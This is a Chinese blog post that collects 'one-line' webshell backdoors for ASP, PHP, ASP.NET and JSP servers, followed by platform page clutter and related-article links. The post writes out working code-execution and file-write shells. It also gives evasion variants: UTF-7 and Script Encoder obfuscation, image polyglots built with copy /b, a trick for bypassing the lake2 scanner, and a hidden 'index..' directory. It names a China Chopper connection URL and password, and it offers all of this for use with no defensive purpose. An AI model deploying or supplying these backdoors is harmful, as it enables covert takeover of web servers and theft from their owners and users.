ASP+PHP+ASP.NET+JSP各种变形一句话大集结

最新推荐文章于 2021-03-10 14:54:07 发布
最新推荐文章于 2021-03-10 14:54:07 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: PHP ASP ASP.NET 文章标签: PHP ASP ASP.NET
PHP 同时被 3 个专栏收录
76 篇文章 0 订阅
订阅专栏
ASP.NET
6 篇文章 0 订阅
订阅专栏
ASP
1 篇文章 0 订阅
订阅专栏

ASP版:

<%execute request("#")%>

<%execute request(chr(35))%>

<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>

<%ExecuteGlobal request(chr(35))%>

<%eval request("#")%>

上面的是正常的SHELL,下面是变形的,

数据库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936″%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

用include包含一个图片,图片最好是通过copy /b a.jpg+b.asp+c.jpg d.jpg生成出来的
要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以了

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1″)
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

另类的,利用windows的目录漏洞,建立..目录里面放一句话,
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"index..")
Set a = fso.CreateTextFile(path&"index..1.asp", True)
a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"
a.WriteLine"response.clear"
a.WriteLine"Execute request(chr(35))"
a.WriteLine"response.end"
a.WriteLine"end if"
a.WriteLine"</script>"


<" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>

用冰狐就行了


PHP版:

<?php 
@preg_replace("/[email]/e",$_POST['h'],"error"); 
?> 
菜刀连接:http://xx.com/shell.php?h=@eval($_POST[c]); 密码:c

 

<?php $views=str_replace('x','','xaxxsxxsxexrxt');$views($_REQUEST['xlb']); ?>

 

ASP.NET版:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["xlb"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>


JSP版:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

沧海一波
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ASP.NET学习大总结+笔记
10-06
ASP.NET学习大总结+笔记 分享一下啊
asp.net jscript 一句话木马
IT技术宅-北方的刀郎
03-21 2615
min.aspx复制代码代码如下:复制代码代码如下:     td,table,tr {   list-style: none;   font-family: Verdana, Arial, Helvetica, sans-serif;   font-size: 12px;   line-height: 180%; } input,textarea {     width:780px; }  as
webshell,包含asp,php,aspx,jsp
08-15
asp php aspx jsp webshell,Webshell马全套
ASP.NET常用语句
时空印记的专栏
09-16 534
 1.//弹出对话框.点击转向指定页面 Response.Write(" window.alert(该会员没有提交申请,请重新提交!) "); Response.Write(" window.location =http://www.51aspx.com/bizpulic/upmeb.aspx "); 2.//弹出对话框 Response
php变形一句话,ASP+PHP+ASP.NET+JSP各种变形一句话集结
weixin_30959723的博客
03-10 148
ASP版:if request(chr(35))"""" thenExecuteGlobal request(chr(35))上面的是正常的SHELL,下面是变形的,数据库里插入┼攠數畣整爠煥敵瑳∨∣┩愾utf-7的马用include包含一个图片,图片最好是通过copy /b a.jpg+b.asp+c.jpg d.jpg生成出来的要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以...
一句话木马各种变形
qq_37872337的博客
06-13 1737
0x00:简介         一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。 0x01:叙事 一、常见的一句话 ...
asp 一句话小马_一句话木马:ASP
weixin_39762441的博客
12-29 733
ASP一句话木马收集:""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>"" then ExecuteGlobal request("c") end if%>< %'eval(request("c"))execute request("#")U...
Windows 2003 IIS 6.0 搭建可建虚拟机的asp+.net+php+jsp+mysql+mssql
10-01
Windows 2003 IIS 6.0 搭建可建虚拟机的asp+.net+php+jsp+mysql+mssql
asp.net房屋租赁系统源码+数据库
01-21
【程序老媛出品,必属精品,亲测...资源名:asp.net房屋租赁系统源码+数据库 资源类型:程序源代码 源码说明: 基于ASP.NET写的房屋租赁系统源码 完整代码和注释 很适合学习借鉴 适合人群:新手及有一定经验的开发人员
ASP.NET源码——网页选项卡(div+CSS).zip
10-10
ASP.NET源码——网页选项卡(div+CSS).zip
ASP.NET MVC + FastReport 开发的报表打印Demo.zip
04-14
ASP.NET MVC + FastReport 开发的报表打印Demo.zip
asp一句话
weixin_30834783的博客
12-21 624
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"100"&"+"&"20"&"+"&"3"&")"&")")%> 转载于:https://www.cn...
对这样的程序,你还能说什么~~~
janenone的专栏
03-29 364
1.//弹出对话框.点击转向指定页面 Response.Write(" window.alert(该会员没有提交申请,请重新提交!) "); Response.Write(" window.location=http://www.51aspx.com/bizpulic/upmeb.aspx "); 2.//弹出对话框 Response.Write(" alert(产品添加成功!) 每次
变形马(horse)
知屋安砖
03-04 405
变形马示例HTMLCSSJS 示例 HTML <div id="container"></div> <div class="tips">This demo is using the threejs-geometry-modifiers <a href="https://github.com/a-jie/threejs-geometry-modifiers...
钢筋混凝土污水池及提升泵站施工方案.doc
05-03
课程设计污水处理
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
05-03
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
node-v12.22.10-linux-armv7l.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
The Experiment 3 of Engineering Electromagnetics.pdf
最新发布
05-03
The Experiment 3 of Engineering Electromagnetics.pdf
node-v12.11.0-darwin-x64.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
过狗一句话汇总(包含asp+php+aspx+jsp)
01-26
过狗一句话汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASPPHPASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值